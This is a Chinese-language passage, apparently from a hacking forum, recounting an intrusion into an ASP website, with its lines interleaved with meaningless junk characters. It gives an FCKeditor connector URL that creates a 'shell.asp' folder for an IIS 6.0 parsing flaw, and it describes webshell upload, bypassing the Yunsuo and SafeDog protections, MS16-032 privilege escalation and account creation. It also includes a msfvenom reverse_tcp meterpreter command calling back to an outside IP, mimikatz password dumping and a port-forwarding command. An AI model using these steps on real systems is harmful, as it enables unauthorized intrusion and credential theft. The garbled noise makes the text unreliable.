|
" R) D- V) a$ r6 z+ Z& M: M" b 4 w: U8 E3 A/ |, W7 j# d5 }6 {
$ l2 I4 f3 V# ~0 |4 z3 l, t( g
6 a; ^% N; d; k! v
|
2 A' v+ I0 @ a0 x, v6 y. y ; y& [' G- C4 C
* G5 D* x+ B8 n, V8 w" L. h一、 利用getwebshell篇
& z; w5 b* H: s* Z. q* P
& K, \: w6 ^+ t( m4 W# M6 x首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
/ X8 z3 j1 P) d8 j4 l; }6 V ! ]/ A, M' I' i, D) W) F. V

8 u9 x, h' i1 b) {下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 0 h5 r' w3 N3 {) T g, L( ]+ q

- f c6 \6 {% e7 C" [( g+ T0 [下面我们构造一个asp目录,如: t0 y: f5 D! n( h* S
" h- [& ~* g4 p3 ^% i, i 9 t6 D+ g# @ |$ v0 A$ G# [
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
2 g- C. n& \0 m# [8 N. }- B& V * i7 i3 C1 s+ V0 }+ n
5 a$ ~$ |# i a; P8 @
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 w( U3 l1 d: A
) E! ~. _8 w- |7 E) X, F一、 绕过安全狗云锁提权并且加账号
" p9 L. F8 K8 x/ Z! s . T2 h% G7 V8 b: x2 r2 b) E* {2 y2 D
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
. N$ N O' c. ~! ^5 V# ?
: C% ~# ] u/ C& s1 A4 _6 q! s如图:
$ c: i& O6 I; L! U* y0 l4 r 4 }3 j8 S2 D8 G
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit ( r8 Q1 ~' q4 L
; c0 V5 g& f0 \7 X* f3 a
一、 利用metasploit " k# }: `& \/ U. [
5 v2 r6 F$ d) G, M/ P1 Y0 O首先用pentestbox生成一个64位的payload如下命令
6 V3 R5 F8 [' o2 ]# T6 J! N) I
7 g" J/ Y: g" T/ gmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
0 G) U& Y* B: K8 g0 w9 b7 {7 y
9 v' H3 W- V4 R0 A+ ?/ n! t* a为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图: 0 @7 s& `" b- b& }; K

8 \0 A! u5 n" \下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: - z- R- V% p$ g1 U! i9 D" Z

0 L* w7 P0 D- I& G9 F下面我们来做一个监听如下命令: 7 }4 F2 j, l. F% |7 C$ v* |
$ `6 u% |9 n c$ D3 Z4 g+ M$ t, o
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
8 e7 Q. I# f O4 s 7 ~: M. R8 ^# r* A- e6 W. Q
/ K* [5 {+ n t0 m# f/ Z: G! d |
7 K" g, }" R' w3 S+ ]+ t
& O4 E n6 l0 |% U 4 g8 P( R4 K: k8 ~5 N
$ U" l, p- F# m- G7 F/ s
e# O" B- b% G* ^0 [$ o
( t" {( H/ L* Z' H: b ! W- g- n7 x; J, K/ K
9 B/ |- Z+ F* b* x3 e8 K- p& S
1 @/ w* t. w2 w% {' i
0 M$ @! W; D, z( l$ P7 U
7 V: \# ]+ Y. H: X2 c
) y5 ]/ g2 W. ^$ v6 @5 L
7 v6 P1 C/ V' T5 X0 n, }& | 2 M& G- b, |+ U( `* H; w9 Y
|